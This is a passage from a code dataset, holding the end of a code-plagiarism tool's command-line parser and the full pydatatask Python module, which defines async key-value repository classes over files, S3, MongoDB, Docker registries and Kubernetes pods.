\"\n \"If it's directory, than creates file in it with \"\n f\"name '{DEFAULT_GENERAL_REPORT_NAME}'.\",\n required=True,\n type=Path,\n )\n\n def __init__(self):\n super(CodeplagCLI, self).__init__(\n prog=UTIL_NAME,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Program help to find similar parts of source \"\n \"codes for the different languages.\",\n )\n self.add_argument(\n \"-v\",\n \"--version\",\n help=\"Print current version number and exit.\",\n action=\"version\",\n version=f\"{UTIL_NAME} {UTIL_VERSION}\",\n )\n self.add_argument(\n \"--verbose\",\n help=\"Show debug messages.\",\n action=\"store_true\",\n )\n\n subparsers = self.add_subparsers(\n help=\"Commands help.\",\n parser_class=argparse.ArgumentParser,\n required=True,\n metavar=\"COMMAND\",\n dest=\"root\",\n )\n\n self.__add_settings_path(subparsers)\n self.__add_check_path(subparsers)\n self.__add_report_path(subparsers)\n","repo_name":"OSLL/code-plagiarism","sub_path":"src/codeplag/codeplagcli.py","file_name":"codeplagcli.py","file_ext":"py","file_size_in_byte":9281,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"}
+{"seq_id":"11040107019","text":"\"\"\"\nRepositories are arbitrary key-value stores. They are the data part of pydatatask.\nYou can store your data in any way you desire and as long as you can write a Repository class to describe it, it can be\nused to drive a pipeline.\n\nThe notion of the \"value\" part of the key-value store abstraction is defined very, very loosely. The repository base\nclass doesn't have an interface to get or store values, only to query for and delete keys. Instead, you have to know\nwhich repository subclass you're working with, and use its interfaces. For example, `MetadataRepository` assumes that\nits values are structured objects and loads them fully into memory, and `BlobRepository` provides a streaming interface\nto a flat address space.\n\"\"\"\nfrom typing import (\n TYPE_CHECKING,\n Any,\n AsyncGenerator,\n AsyncIterable,\n Awaitable,\n Callable,\n Coroutine,\n Dict,\n List,\n Literal,\n Optional,\n overload,\n)\nfrom abc import ABC, abstractmethod\nfrom collections import Counter\nfrom pathlib import Path\nimport base64\nimport hashlib\nimport inspect\nimport io\nimport logging\nimport os\nimport string\n\nfrom kubernetes_asyncio.client import V1Pod\nfrom types_aiobotocore_s3.client import S3Client\nimport aiofiles.os\nimport aiohttp.client_exceptions\nimport aioshutil\nimport botocore.exceptions\nimport docker_registry_client_async\nimport dxf\nimport motor.motor_asyncio\nimport yaml\n\nfrom .utils import AReadStream, AReadText, AWriteStream, AWriteText, roundrobin\n\nif TYPE_CHECKING:\n from .task import ExecutorTask, KubeTask\n\nl = logging.getLogger(__name__)\n\n__all__ = (\n \"Repository\",\n \"BlobRepository\",\n \"MetadataRepository\",\n \"FileRepositoryBase\",\n \"FileRepository\",\n \"DirectoryRepository\",\n \"S3BucketRepository\",\n \"S3BucketInfo\",\n \"MongoMetadataRepository\",\n \"InProcessMetadataRepository\",\n \"InProcessBlobStream\",\n \"InProcessBlobRepository\",\n \"DockerRepository\",\n \"LiveKubeRepository\",\n \"ExecutorLiveRepo\",\n \"AggregateOrRepository\",\n \"AggregateAndRepository\",\n \"BlockingRepository\",\n \"YamlMetadataRepository\",\n \"YamlMetadataFileRepository\",\n \"YamlMetadataS3Repository\",\n \"RelatedItemRepository\",\n)\n\n\ndef job_getter(f):\n \"\"\"\n Use this function to annotate non-abstract methods which take a job identifier as their first parameter. This is\n used by RelatedItemRepository to automatically translate job identifiers to related ones.\n \"\"\"\n if not inspect.iscoroutinefunction(f):\n raise TypeError(\"only async functions can be job_getters\")\n f.is_job_getter = True\n return f\n\n\nclass Repository(ABC):\n \"\"\"\n A repository is a key-value store where the keys are names of jobs. Since the values have unspecified semantics, the\n only operations you can do on a generic repository are query for keys.\n\n A repository can be async-iterated to get a listing of its members.\n \"\"\"\n\n CHARSET = CHARSET_START_END = string.ascii_letters + string.digits\n\n @classmethod\n def is_valid_job_id(cls, job: str):\n \"\"\"\n Determine whether the given job identifier is valid, i.e. 
that it contains only valid characters\n (numbers and letters by default).\n \"\"\"\n return (\n 0 < len(job) < 64\n and all(c in cls.CHARSET for c in job)\n and job[0] in cls.CHARSET_START_END\n and job[-1] in cls.CHARSET_START_END\n )\n\n async def filter_jobs(self, iterator: AsyncIterable[str]) -> AsyncIterable[str]:\n \"\"\"\n Apply `is_valid_job_id` as a filter to an async iterator.\n \"\"\"\n async for job in iterator:\n if self.is_valid_job_id(job):\n yield job\n else:\n l.warning(\"Skipping %s %s - not a valid job id\", self, repr(job))\n\n async def contains(self, item):\n \"\"\"\n Determine whether the given job identifier is present in this repository.\n\n The default implementation is quite inefficient; please override this if possible.\n \"\"\"\n async for x in self:\n if x == item:\n return True\n return False\n\n def __aiter__(self):\n return self.filter_jobs(self.unfiltered_iter())\n\n @abstractmethod\n async def unfiltered_iter(self) -> AsyncGenerator[str, None]:\n \"\"\"\n The core method of Repository. Implement this to produce an iterable of every string which could potentially\n be a job identifier present in this repository. When the repository is iterated directly, this will be filtered\n by `filter_jobs`.\n \"\"\"\n raise NotImplementedError\n # noinspection PyUnreachableCode\n yield None # pylint: disable=unreachable\n\n @abstractmethod\n async def info(self, job) -> Any:\n \"\"\"\n Returns an arbitrary piece of data related to job. Notably, this is used during templating.\n This should do something meaningful even if the repository does not contain the requested job.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n async def delete(self, job):\n \"\"\"\n Delete the given job from the repository. This should succeed even if the job is not present in this repository.\n \"\"\"\n raise NotImplementedError\n\n async def info_all(self) -> Dict[str, Any]:\n \"\"\"\n Produce a mapping from every job present in the repository to its corresponding info. The default implementation\n is somewhat inefficient; please override it if there is a more effective way to load all info.\n \"\"\"\n return {job: await self.info(job) async for job in self}\n\n async def validate(self):\n \"\"\"\n Override this method to raise an exception if for any reason the repository is misconfigured. 
This will be\n automatically called by the pipeline on opening.\n \"\"\"\n\n def map(\n self, func: Callable, filt: Optional[Callable[[str], Awaitable[bool]]] = None, allow_deletes=False\n ) -> \"MapRepository\":\n \"\"\"\n Generate a :class:`MapRepository` based on this repository and the given parameters.\n \"\"\"\n return MapRepository(self, func, filt, allow_deletes=allow_deletes)\n\n\nclass MapRepository(Repository):\n \"\"\"\n A MapRepository is a repository which uses arbitrary functions to map and filter results from a base repository.\n \"\"\"\n\n def __init__(\n self,\n base: Repository,\n func: Callable[[Any], Coroutine[None, None, Any]],\n filt: Optional[Callable[[str], Awaitable[bool]]] = None,\n allow_deletes=False,\n ):\n \"\"\"\n :param func: The function to use to translate the base repository's `info` results into the mapped `info`\n results.\n :param filt: Optional: An async function to use to determine whether a given key should be considered part of\n the mapped repository.\n :param allow_deletes: Whether the delete operation will do anything on the mapped repository.\n \"\"\"\n self.base = base\n self.func = func\n self.filter = filt\n self.allow_deletes = allow_deletes\n\n async def contains(self, item):\n if self.filter is None or await self.filter(item):\n return await self.base.contains(item)\n return False\n\n async def delete(self, job):\n if self.allow_deletes:\n await self.base.delete(job)\n\n async def unfiltered_iter(self):\n async for item in self.base.unfiltered_iter():\n if self.filter is None or await self.filter(item):\n yield item\n\n async def info(self, job):\n return await self.func(await self.base.info(job))\n\n async def info_all(self) -> Dict[str, Any]:\n result = await self.base.info_all()\n to_remove = []\n for k, v in result.items():\n if self.filter is None or await self.filter(k):\n result[k] = await self.func(v)\n else:\n to_remove.append(k)\n for k in to_remove:\n result.pop(k)\n return result\n\n\nclass MetadataRepository(Repository, ABC):\n \"\"\"\n A metadata repository has values which are small, structured data, and loads them entirely into memory, returning\n the structured data from the `info` method.\n \"\"\"\n\n @abstractmethod\n async def info(self, job):\n \"\"\"\n Retrieve the data with key ``job`` from the repository.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n async def dump(self, job, data):\n \"\"\"\n Insert ``data`` into the repository with key ``job``.\n \"\"\"\n raise NotImplementedError\n\n\nclass BlobRepository(Repository, ABC):\n \"\"\"\n A blob repository has values which are flat data blobs that can be streamed for reading or writing.\n \"\"\"\n\n @overload\n async def open(self, job: str, mode: Literal[\"r\"]) -> AReadText:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"rb\"]) -> AReadStream:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"w\"]) -> AWriteText:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"wb\"]) -> AWriteStream:\n ...\n\n @abstractmethod\n async def open(self, job, mode=\"r\"):\n \"\"\"\n Open the given job's value as a stream for reading or writing, in text or binary mode.\n \"\"\"\n raise NotImplementedError\n\n\nclass FileRepositoryBase(Repository, ABC):\n \"\"\"\n A file repository is a local directory where each job identifier is a filename, optionally suffixed with an\n extension before hitting the filesystem. 
This is an abstract base class for other file repositories which have more\n to say about what is found at these filepaths.\n \"\"\"\n\n def __init__(self, basedir, extension=\"\", case_insensitive=False):\n self.basedir = Path(basedir)\n self.extension = extension\n self.case_insensitive = case_insensitive\n\n async def contains(self, item):\n return await aiofiles.os.path.exists(self.basedir / (item + self.extension))\n\n def __repr__(self):\n return f'<{type(self).__name__} {self.basedir / (\"*\" + self.extension)}>'\n\n async def unfiltered_iter(self):\n for name in await aiofiles.os.listdir(self.basedir):\n if self.case_insensitive:\n cond = name.lower().endswith(self.extension.lower())\n else:\n cond = name.endswith(self.extension)\n if cond:\n yield name[: -len(self.extension) if self.extension else None]\n\n async def validate(self):\n self.basedir.mkdir(exist_ok=True, parents=True)\n if not os.access(self.basedir, os.W_OK):\n raise PermissionError(f\"Cannot write to {self.basedir}\")\n\n def fullpath(self, job) -> Path:\n \"\"\"\n Construct the full local path of the file corresponding to ``job``.\n \"\"\"\n return self.basedir / (job + self.extension)\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The templating info provided by a file repository is the full path to the corresponding file as a string.\n \"\"\"\n return str(self.fullpath(job))\n\n\nclass FileRepository(FileRepositoryBase, BlobRepository):\n \"\"\"\n A file repository whose members are files, treated as streamable blobs.\n \"\"\"\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n return aiofiles.open(self.fullpath(job), mode)\n\n async def delete(self, job):\n try:\n await aiofiles.os.unlink(self.fullpath(job))\n except FileNotFoundError:\n pass\n\n\nclass DirectoryRepository(FileRepositoryBase):\n \"\"\"\n A file repository whose members are directories.\n \"\"\"\n\n def __init__(self, *args, discard_empty=False, **kwargs):\n \"\"\"\n :param discard_empty: Whether only directories containing at least one member should be considered as \"present\"\n in the repository.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.discard_empty = discard_empty\n\n @job_getter\n async def mkdir(self, job):\n \"\"\"\n Create an empty directory corresponding to ``job``. 
Do nothing if the directory already exists.\n \"\"\"\n try:\n await aiofiles.os.mkdir(self.fullpath(job))\n except FileExistsError:\n pass\n\n async def delete(self, job):\n if await self.contains(job):\n await aioshutil.rmtree(self.fullpath(job))\n\n async def contains(self, item):\n result = await super().contains(item)\n if not self.discard_empty:\n return result\n if not result:\n return False\n return bool(list(await aiofiles.os.listdir(self.fullpath(item))))\n\n async def unfiltered_iter(self):\n async for item in super().unfiltered_iter():\n if self.discard_empty:\n if bool(list(await aiofiles.os.listdir(self.fullpath(item)))):\n yield item\n else:\n yield item\n\n\nclass S3BucketBinaryWriter:\n \"\"\"\n A class for streaming (or buffering) byte data to be written to an `S3BucketRepository`.\n \"\"\"\n\n def __init__(self, repo: \"S3BucketRepository\", job: str):\n self.repo = repo\n self.job = job\n self.buffer = io.BytesIO()\n super().__init__()\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.close()\n\n async def close(self):\n \"\"\"\n Close and flush the data to the bucket.\n \"\"\"\n self.buffer.seek(0, io.SEEK_END)\n size = self.buffer.tell()\n self.buffer.seek(0, io.SEEK_SET)\n await self.repo.client.put_object(\n Bucket=self.repo.bucket,\n Key=self.repo.object_name(self.job),\n Body=self.buffer,\n ContentLength=size,\n ContentType=self.repo.mimetype,\n )\n\n async def write(self, data: bytes):\n \"\"\"\n Write some data to the stream.\n \"\"\"\n self.buffer.write(data)\n\n\nclass S3BucketReader:\n \"\"\"\n A class for streaming byte data from an `S3BucketRepository`.\n \"\"\"\n\n def __init__(self, body):\n self.body = body\n\n async def close(self):\n \"\"\"\n Close and release the stream.\n \"\"\"\n self.body.close()\n\n async def read(self, n=None): # pylint: disable=unused-argument :(\n \"\"\"\n Read the entire body of the blob. Due to API limitations, we can't read less than that at once...\n \"\"\"\n return await self.body.read()\n\n async def __aenter__(self):\n await self.body.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.body.__aexit__(exc_type, exc_val, exc_tb)\n\n\nclass S3BucketInfo:\n \"\"\"\n The data structure returned from :meth:`S3BucketRepository.info`.\n\n :ivar uri: The s3 URI of the current job's resource, e.g. ``s3://bucket/prefix/job.ext``. ``str(info)`` will also\n return this.\n :ivar endpoint: The URL of the API server providing the S3 interface.\n :ivar bucket: The name of the bucket objects are stored in.\n :ivar prefix: How to prefix an object name such that it will fit into this repository.\n :ivar suffix: How to suffix an object name such that it will fit into this repository.\n \"\"\"\n\n def __init__(self, endpoint: str, uri: str, bucket: str, prefix: str, suffix: str):\n self.endpoint = endpoint\n self.uri = uri\n self.prefix = prefix\n self.suffix = suffix\n self.bucket = bucket\n\n def __str__(self):\n return self.uri\n\n\nclass S3BucketRepository(BlobRepository):\n \"\"\"\n A repository where keys are paths in a S3 bucket. 
Provides a streaming interface to the corresponding blobs.\n \"\"\"\n\n def __init__(\n self,\n client: Callable[[], S3Client],\n bucket: str,\n prefix: str = \"\",\n suffix: str = \"\",\n mimetype: str = \"application/octet-stream\",\n incluster_endpoint: Optional[str] = None,\n ):\n \"\"\"\n :param client: A callable returning an aiobotocore S3 client connected and authenticated to the server you wish\n to store things on.\n :param bucket: The name of the bucket from which to load and store.\n :param prefix: A prefix to put on the job name before translating it into a bucket path. If this is meant to be\n a directory name it should end with a slash character.\n :param suffix: A suffix to put on the job name before translating it into a bucket path. If this is meant to\n be a file extension it should start with a dot.\n :param mimetype: The MIME type to set the content when adding data.\n :param incluster_endpoint: Optional: An endpoint URL to provide as the result of info() queries instead of\n extracting the URL from ``client``.\n \"\"\"\n self._client = client\n self.bucket = bucket\n self.prefix = prefix\n self.suffix = suffix\n self.mimetype = mimetype\n self.incluster_endpoint = incluster_endpoint\n\n @property\n def client(self):\n \"\"\"\n The aiobotocore S3 client. This will raise an error if the client comes from a session which is not opened.\n \"\"\"\n return self._client()\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self.bucket}/{self.prefix}*{self.suffix}>\"\n\n async def contains(self, item):\n try:\n await self.client.head_object(Bucket=self.bucket, Key=self.object_name(item))\n except botocore.exceptions.ClientError:\n return False\n else:\n return True\n\n async def unfiltered_iter(self):\n paginator = self.client.get_paginator(\"list_objects\")\n async for page in paginator.paginate(Bucket=self.bucket, Prefix=self.prefix):\n for obj in page.get(\"Contents\", []):\n if obj[\"Key\"].endswith(self.suffix):\n yield obj[\"Key\"][len(self.prefix) : -len(self.suffix) if self.suffix else None]\n\n async def validate(self):\n try:\n await self.client.head_bucket(Bucket=self.bucket)\n except botocore.exceptions.ClientError as e:\n if \"404\" in str(e):\n await self.client.create_bucket(Bucket=self.bucket)\n else:\n raise\n\n def object_name(self, job):\n \"\"\"\n Return the object name for the given job.\n \"\"\"\n return f\"{self.prefix}{job}{self.suffix}\"\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n if mode == \"wb\":\n return S3BucketBinaryWriter(self, job)\n elif mode == \"w\":\n return AWriteText(S3BucketBinaryWriter(self, job))\n elif mode == \"rb\":\n return S3BucketReader((await self.client.get_object(Bucket=self.bucket, Key=self.object_name(job)))[\"Body\"])\n elif mode == \"r\":\n return AReadText(\n S3BucketReader((await self.client.get_object(Bucket=self.bucket, Key=self.object_name(job)))[\"Body\"])\n )\n else:\n raise ValueError(mode)\n\n @job_getter\n async def info(self, job):\n \"\"\"\n Return an `S3BucketInfo` corresponding to the given job.\n \"\"\"\n return S3BucketInfo(\n self.incluster_endpoint or self.client._endpoint.host,\n f\"s3://{self.bucket}/{self.object_name(job)}\",\n self.bucket,\n self.prefix,\n self.suffix,\n )\n\n async def delete(self, job):\n await self.client.delete_object(Bucket=self.bucket, Key=self.object_name(job))\n\n\nclass MongoMetadataRepository(MetadataRepository):\n \"\"\"\n A metadata repository using a MongoDB collection as the backing 
store.\n \"\"\"\n\n def __init__(\n self,\n collection: Callable[[], motor.motor_asyncio.AsyncIOMotorCollection],\n subcollection: Optional[str],\n ):\n \"\"\"\n :param collection: A callable returning a motor async collection.\n :param subcollection: Optional: the name of a subcollection within the collection in which to store data.\n \"\"\"\n self._collection = collection\n self._subcollection = subcollection\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self._subcollection}>\"\n\n @property\n def collection(self) -> motor.motor_asyncio.AsyncIOMotorCollection:\n \"\"\"\n The motor async collection data will be stored in. If this is provided by an unopened session, raise an error.\n \"\"\"\n result = self._collection()\n if self._subcollection is not None:\n result = result[self._subcollection]\n return result\n\n async def contains(self, item):\n return await self.collection.count_documents({\"_id\": item}) != 0\n\n async def delete(self, job):\n await self.collection.delete_one({\"_id\": job})\n\n async def unfiltered_iter(self):\n async for x in self.collection.find({}, projection=[]):\n yield x[\"_id\"]\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info of a mongo metadata repository is the literal value stored in the repository with identifier ``job``.\n \"\"\"\n result = await self.collection.find_one({\"_id\": job})\n if result is None:\n result = {}\n return result\n\n async def info_all(self) -> Dict[str, Any]:\n return {entry[\"_id\"]: entry async for entry in self.collection.find({})}\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n await self.collection.replace_one({\"_id\": job}, data, upsert=True)\n\n\nclass DockerRepository(Repository):\n \"\"\"\n A docker repository is, well, an actual docker repository hosted in some registry somewhere. Keys translate to tags\n on this repository.\n \"\"\"\n\n def __init__(\n self,\n registry: Callable[[], docker_registry_client_async.DockerRegistryClientAsync],\n domain: str,\n repository: str,\n ):\n \"\"\"\n :param registry: A callable returning a\n `docker_registry_client_async `_\n client object with appropriate authentication information.\n :param domain: The registry domain to connect to, e.g. ``index.docker.io``.\n :param repository: The repository to store images in within the domain, e.g. ``myname/myrepo``.\n \"\"\"\n self._registry = registry\n self.domain = domain\n self.repository = repository\n\n @property\n def registry(self) -> docker_registry_client_async.DockerRegistryClientAsync:\n \"\"\"\n The ``docker_registry_client_async`` client object. If this is provided by an unopened session, raise an error.\n \"\"\"\n return self._registry()\n\n async def unfiltered_iter(self):\n try:\n image = docker_registry_client_async.ImageName(self.repository, endpoint=self.domain)\n tags = (await self.registry.get_tags(image)).tags[\"tags\"]\n if tags is None:\n return\n for tag in tags:\n yield tag\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.status != 404:\n raise\n\n def __repr__(self):\n return f\"\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by a docker repository is a dict with two keys, \"withdomain\" and \"withoutdomain\". e.g.:\n\n .. 
code::\n\n { \"withdomain\": \"docker.example.com/myname/myrepo:job\", \"withoutdomain\": \"myname/myrepo:job\" }\n \"\"\"\n return {\n \"withdomain\": f\"{self.domain}/{self.repository}:{job}\",\n \"withoutdomain\": f\"{self.repository}:{job}\",\n }\n\n def _dxf_auth(self, dxf_obj, response):\n # what a fucking hack\n for pattern, credentials in self.registry.credentials.items():\n if pattern.fullmatch(self.domain):\n result = credentials\n break\n else:\n raise PermissionError(\"Missing credentials for %s\" % self.domain)\n if self.registry.ssl:\n username, password = base64.b64decode(result).decode().split(\":\")\n dxf_obj.authenticate(username, password, response)\n else:\n dxf_obj._headers = {\"Authorization\": \"Basic \" + result}\n\n async def delete(self, job):\n # if not await self.contains(job):\n # return\n\n self._delete_inner(job) # blocking! epic fail\n\n def _delete_inner(self, job):\n random_data = os.urandom(16)\n random_digest = \"sha256:\" + hashlib.sha256(random_data).hexdigest()\n\n d = dxf.DXF(\n host=self.domain,\n repo=self.repository,\n auth=self._dxf_auth,\n insecure=not self.registry.ssl,\n )\n d.push_blob(data=random_data, digest=random_digest)\n d.set_alias(job, random_digest)\n d.del_alias(job)\n\n\nclass LiveKubeRepository(Repository):\n \"\"\"\n A repository where keys translate to ``job`` labels on running kube pods. This repository is constructed\n automatically by a `KubeTask` or subclass and is linked as the ``live`` repository. Do not construct this class\n manually.\n \"\"\"\n\n def __init__(self, task: \"KubeTask\"):\n self.task = task\n\n async def unfiltered_iter(self):\n for pod in await self.pods():\n yield pod.metadata.labels[\"job\"]\n\n async def contains(self, item):\n return bool(await self.task.podman.query(task=self.task.name, job=item))\n\n def __repr__(self):\n return f\"\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n Cannot template with live kube info. Implement this if you have something in mind.\n \"\"\"\n return None\n\n async def pods(self) -> List[V1Pod]:\n \"\"\"\n A list of live pod objects corresponding to this repository.\n \"\"\"\n return await self.task.podman.query(task=self.task.name)\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from this repository will delete the pod.\n \"\"\"\n pods = await self.task.podman.query(job=job, task=self.task.name)\n for pod in pods: # there... 
really should be only one\n await self.task.delete(pod)\n # while await self.task.podman.query(job=job, task=self.task.name):\n # await asyncio.sleep(0.2)\n\n\nclass AggregateAndRepository(Repository):\n \"\"\"\n A repository which is said to contain a job if all its children also contain that job\n \"\"\"\n\n def __init__(self, **children: Repository):\n assert children\n self.children = children\n\n async def unfiltered_iter(self):\n counting = Counter()\n async for item in roundrobin([child.unfiltered_iter() for child in self.children.values()]):\n counting[item] += 1\n if counting[item] == len(self.children):\n yield item\n\n async def contains(self, item):\n for child in self.children.values():\n if not await child.contains(item):\n return False\n return True\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by an aggregate And repository is a dict mapping each child's name to that child's info.\n \"\"\"\n return {name: await child.info(job) for name, child in self.children.items()}\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from an aggregate And repository deletes the job from all of its children.\n \"\"\"\n for child in self.children.values():\n await child.delete(job)\n\n\nclass AggregateOrRepository(Repository):\n \"\"\"\n A repository which is said to contain a job if any of its children also contain that job\n \"\"\"\n\n def __init__(self, **children: Repository):\n assert children\n self.children = children\n\n async def unfiltered_iter(self):\n seen = set()\n for child in self.children.values():\n async for item in child.unfiltered_iter():\n if item in seen:\n continue\n seen.add(item)\n yield item\n\n async def contains(self, item):\n for child in self.children.values():\n if await child.contains(item):\n return True\n return False\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by an aggregate Or repository is a dict mapping each child's name to that child's info.\n \"\"\"\n return {name: await child.info(job) for name, child in self.children.items()}\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from an aggregate Or repository deletes the job from all of its children.\n \"\"\"\n for child in self.children.values():\n await child.delete(job)\n\n\nclass BlockingRepository(Repository):\n \"\"\"\n A class that is said to contain a job if ``source`` contains it and ``unless`` does not contain it\n \"\"\"\n\n def __init__(self, source: Repository, unless: Repository, enumerate_unless=True):\n self.source = source\n self.unless = unless\n self.enumerate_unless = enumerate_unless\n\n async def unfiltered_iter(self):\n if self.enumerate_unless:\n blocked = set()\n async for x in self.unless.unfiltered_iter():\n blocked.add(x)\n else:\n blocked = None\n async for item in self.source.unfiltered_iter():\n if self.enumerate_unless and item in blocked:\n continue\n if not self.enumerate_unless and self.unless.contains(item):\n continue\n yield item\n\n async def contains(self, item):\n return await self.source.contains(item) and not await self.unless.contains(item)\n\n @job_getter\n async def info(self, job):\n return await self.source.info(job)\n\n async def delete(self, job):\n await self.source.delete(job)\n\n\nclass YamlMetadataRepository(BlobRepository, MetadataRepository, ABC):\n \"\"\"\n A metadata repository based on a blob repository. 
When info is accessed, it will **load the target file into\n memory**, parse it as yaml, and return the resulting object.\n\n This is a base class, and must be overridden to implement the blob loading portion.\n \"\"\"\n\n @job_getter\n async def info(self, job):\n async with await self.open(job, \"rb\") as fp:\n s = await fp.read()\n return yaml.safe_load(s)\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n s = yaml.safe_dump(data, None)\n async with await self.open(job, \"w\") as fp:\n await fp.write(s)\n\n\nclass YamlMetadataFileRepository(YamlMetadataRepository, FileRepository):\n \"\"\"\n A metadata repository based on a file blob repository.\n \"\"\"\n\n def __init__(self, filename, extension=\".yaml\", case_insensitive=False):\n super().__init__(filename, extension=extension, case_insensitive=case_insensitive)\n\n\nclass YamlMetadataS3Repository(YamlMetadataRepository, S3BucketRepository):\n \"\"\"\n A metadata repository based on a s3 bucket repository.\n \"\"\"\n\n def __init__(self, client, bucket, prefix, suffix=\".yaml\", mimetype=\"text/yaml\"):\n super().__init__(client, bucket, prefix, suffix=suffix, mimetype=mimetype)\n\n @job_getter\n async def info(self, job):\n try:\n return await super().info(job)\n except botocore.exceptions.ClientError as e:\n if \"NoSuchKey\" in str(e):\n return {}\n else:\n raise\n\n\nclass RelatedItemRepository(Repository):\n \"\"\"\n A repository which returns items from another repository based on following a related-item lookup.\n \"\"\"\n\n def __init__(\n self,\n base_repository: Repository,\n translator_repository: Repository,\n allow_deletes=False,\n prefetch_lookup=True,\n ):\n \"\"\"\n :param base_repository: The repository from which to return results based on translated keys. The resulting\n repository will duck-type as the same type as the base.\n :param translator_repository: A repository whose info() will be used to translate keys:\n ``info(job) == translated_job``.\n :param allow_deletes: Whether the delete operation on this repository does anything. 
If enabled, it will delete\n only from the base repository.\n :param prefetch_lookup: Whether to cache the entirety of the translator repository in memory to improve\n performance.\n \"\"\"\n self.base_repository = base_repository\n self.translator_repository = translator_repository\n self.allow_deletes = allow_deletes\n self.prefetch_lookup_setting = prefetch_lookup\n self.prefetch_lookup = None\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self.base_repository} by {self.translator_repository}>\"\n\n async def _lookup(self, item):\n if self.prefetch_lookup is None and self.prefetch_lookup_setting:\n self.prefetch_lookup = await self.translator_repository.info_all()\n if self.prefetch_lookup:\n return self.prefetch_lookup.get(item)\n else:\n return await self.translator_repository.info(item)\n\n async def contains(self, item):\n basename = await self._lookup(item)\n if basename is None:\n return False\n return await self.base_repository.contains(basename)\n\n async def delete(self, job):\n if not self.allow_deletes:\n return\n\n basename = await self._lookup(job)\n if basename is None:\n return\n\n await self.base_repository.delete(basename)\n\n @job_getter\n async def info(self, job):\n basename = await self._lookup(job)\n if basename is None:\n raise LookupError(job)\n\n return await self.base_repository.info(basename)\n\n def __getattr__(self, item):\n v = getattr(self.base_repository, item)\n if not getattr(v, \"is_job_getter\", False):\n return v\n\n async def inner(job, *args, **kwargs):\n basename = await self._lookup(job)\n if basename is None:\n raise LookupError(job)\n return await v(basename, *args, **kwargs)\n\n return inner\n\n async def unfiltered_iter(self):\n base_contents = {x async for x in self.base_repository}\n async for item in self.translator_repository:\n basename = await self._lookup(item)\n if basename is not None and basename in base_contents:\n yield item\n\n\nclass ExecutorLiveRepo(Repository):\n \"\"\"\n A repository where keys translate to running jobs in an ExecutorTask. This repository is constructed automatically\n and is linked as the ``live`` repository. 
Do not construct this class manually.\n \"\"\"\n\n def __init__(self, task: \"ExecutorTask\"):\n self.task = task\n\n def __repr__(self):\n return f\"<{type(self).__name__} task={self.task.name}>\"\n\n async def unfiltered_iter(self):\n for job in self.task.rev_jobs:\n yield job\n\n async def contains(self, item):\n return item in self.task.rev_jobs\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from the repository will cancel the corresponding task.\n \"\"\"\n await self.task.cancel(job)\n\n async def info(self, job):\n \"\"\"\n There is no templating info for an `ExecutorLiveRepo`.\n \"\"\"\n return None\n\n\nclass InProcessMetadataRepository(MetadataRepository):\n \"\"\"\n An incredibly simple metadata repository which stores all its values in a dict, and will let them vanish when the\n process terminates.\n \"\"\"\n\n def __init__(self, data: Optional[Dict[str, Any]] = None):\n self.data: Dict[str, Any] = data if data is not None else {}\n\n def __repr__(self):\n return f\"<{type(self).__name__}>\"\n\n @job_getter\n async def info(self, job):\n return self.data.get(job)\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n self.data[job] = data\n\n async def contains(self, item):\n return item in self.data\n\n async def delete(self, job):\n del self.data[job]\n\n async def unfiltered_iter(self):\n for job in self.data:\n yield job\n\n\nclass InProcessBlobStream:\n \"\"\"\n A stream returned from an `BlobRepository.open` call from `InProcessBlobRepository`. Do not construct this manually.\n \"\"\"\n\n def __init__(self, repo: \"InProcessBlobRepository\", job: str): # pylint: disable=missing-function-docstring\n self.repo = repo\n self.job = job\n self.data = io.BytesIO(repo.data.get(job, b\"\"))\n\n async def read(self, n: Optional[int] = None) -> bytes:\n \"\"\"\n Read up to ``n`` bytes from the stream.\n \"\"\"\n return self.data.read(n)\n\n async def write(self, data: bytes):\n \"\"\"\n Write ``data`` to the stream.\n \"\"\"\n self.data.write(data)\n\n async def close(self):\n \"\"\"\n Close and release the stream, syncing the data back to the repository.\n \"\"\"\n self.repo.data[self.job] = self.data.getvalue()\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.close()\n\n\nclass InProcessBlobRepository(BlobRepository):\n \"\"\"\n An incredibly simple blob repository which stores all its values in a dict, and will let them vanish when the\n process terminates.\n \"\"\"\n\n def __init__(self, data: Optional[Dict[str, bytes]] = None):\n self.data = data if data is not None else {}\n\n def __repr__(self):\n return f\"<{type(self).__name__}>\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n There is no templating info for an `InProcessBlobRepository`.\n \"\"\"\n return None\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n stream = InProcessBlobStream(self, job)\n if mode == \"r\":\n return AReadText(stream)\n elif mode == \"w\":\n return AWriteText(stream)\n else:\n return stream\n\n 